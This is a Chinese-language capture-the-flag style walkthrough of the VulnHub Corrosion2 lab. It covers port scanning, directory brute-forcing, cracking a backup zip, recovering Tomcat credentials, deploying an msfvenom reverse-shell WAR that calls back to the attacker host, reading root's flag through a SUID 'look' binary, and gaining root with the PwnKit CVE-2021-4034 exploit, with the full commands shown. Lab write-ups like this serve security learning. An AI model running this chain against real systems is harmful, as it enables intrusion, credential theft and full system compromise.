端口扫描

──(mikannse㉿kali)-[~/vulnhub/Corrosion2]
└─$ sudo nmap --min-rate=10000 -p- 192.168.56.140    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-03 15:26 CST
Nmap scan report for 192.168.56.140
Host is up (0.00014s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8080/tcp open  http-proxy
MAC Address: 08:00:27:50:6A:48 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 15.57 seconds

┌──(mikannse㉿kali)-[~/vulnhub/Corrosion2]
└─$ sudo nmap -sT -sC -sV -O -p22,80,8080 192.168.56.140
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-03 15:27 CST
Nmap scan report for 192.168.56.140
Host is up (0.00036s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 6a:d8:44:60:80:39:7e:f0:2d:08:2f:e5:83:63:f0:70 (RSA)
|   256 f2:a6:62:d7:e7:6a:94:be:7b:6b:a5:12:69:2e:fe:d7 (ECDSA)
|_  256 28:e1:0d:04:80:19:be:44:a6:48:73:aa:e8:6a:65:44 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
8080/tcp open  http    Apache Tomcat 9.0.53
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/9.0.53
|_http-favicon: Apache Tomcat
MAC Address: 08:00:27:50:6A:48 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.49 seconds

Getshell

80就是一个平常的apache默认页面，扫描目录也没有别的结果

8080是一个tomcat,尝试了一些默认的枚举，没有结果，扫描一下目录

┌──(mikannse㉿kali)-[~/vulnhub/Corrosion2]
└─$ gobuster dir -u http://192.168.56.140:8080/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .jsp,war,txt,zip,rar,pdf,sql,zip,bak
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.140:8080/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              bak,jsp,war,txt,zip,rar,pdf,sql
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.jsp            (Status: 200) [Size: 11136]
/docs                 (Status: 302) [Size: 0] [--> /docs/]
/examples             (Status: 302) [Size: 0] [--> /examples/]
/backup.zip           (Status: 200) [Size: 33723]
/readme.txt           (Status: 200) [Size: 153]
/manager              (Status: 302) [Size: 0] [--> /manager/]

有一个readme.txt和backup.zip

得知了用户名是randy，backup.zip看样子是tomcat的配置文件，不过解压需要密码，可以爆破

┌──(mikannse㉿kali)-[~/vulnhub/Corrosion2]
└─$ fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip 


PASSWORD FOUND!!!!: pw == @administrator_hi5

在tomcat-users.xml中能找到用户和密码

<user username="manager" password="melehifokivai" roles="manager-gui"/>

<role rolename="admin-gui"/>
<user username="admin" password="melehifokivai" roles="admin-gui, manager-gui"/>

那么登陆上去之后，生成一个war包部署上去反弹shell

┌──(mikannse㉿kali)-[~/vulnhub/Corrosion2]
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.56.131 LPORT=443 -f war -o revshell.war
Payload size: 1088 bytes
Final size of war file: 1088 bytes
Saved as: revshell.war

提权

上去之后发现之前那个密码适用于jaye用户,里面的Files有一个look的SUID位可执行权限，能够任意文件读取

$ ./look '' "/root/root.txt"
2fdbf8d4f894292361d6c72c8e833a4b

但是还是要尝试进行提权,只有一个任意文件读取，但是读取不到ssh的密钥因为根本不存在

在randy用户的桌面上还有一张纸条以及一个python脚本,但是没有什么用

不过在枚举进程的时候又发现了polkit服务,尝试了上一个靶机的CVE-2021-3560的POC之后无果，尝试 https://github.com/berdav/CVE-2021-4034

下载之后在kali中编译

┌──(mikannse㉿kali)-[~/tools/Privesc/linux/CVE-2021-4034]
└─$ make                              
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.

然后整个目录打包成zip传上去,

运行之后但是会报错version `GLIBC_2.34’ not found (required by ./pwned)

需要在kali中手动编译一下

┌──(mikannse㉿kali)-[~/tools/Privesc/linux/CVE-2021-4034]
└─$ gcc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
                                                                                                     
┌──(mikannse㉿kali)-[~/tools/Privesc/linux/CVE-2021-4034]
└─$ gcc -Wall cve-2021-4034.c -o cve-2021-4034 -static

然后再次打包上传

┌──(mikannse㉿kali)-[~/tools/Privesc/linux]
└─$ zip -r 4034.zip CVE-2021-4034

在靶机上解压然后执行:

$ echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
$ mkdir -p GCONV_PATH=. 
$ cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
$ chmod +x cve-2021-4034

运行之后，提权成功

$ ./cve-2021-4034
# id
uid=0(root) gid=0(root) groups=0(root),1002(jaye)

不过看了一下，虽然和上一个房间用的是同一个服务，CVE编号也很接近，但是原理是不一样的

这个的具体原理可见: https://nvd.nist.gov/vuln/detail/cve-2021-4034 这个内核提权似乎是和脏牛一样比较有名的

碎碎念

常规的tomcat，后面的内核提权，这个其实之前遇到过几次，但是都没有了解原理，借着这两个靶机稍微了解了一下。这个房间的还有一个路径是用look来读取/etc/shadow然后本地爆破，但是我爆破了很久都没结果，看了下WP似乎是要比较久的时间。然后劫持python脚本的base64库文件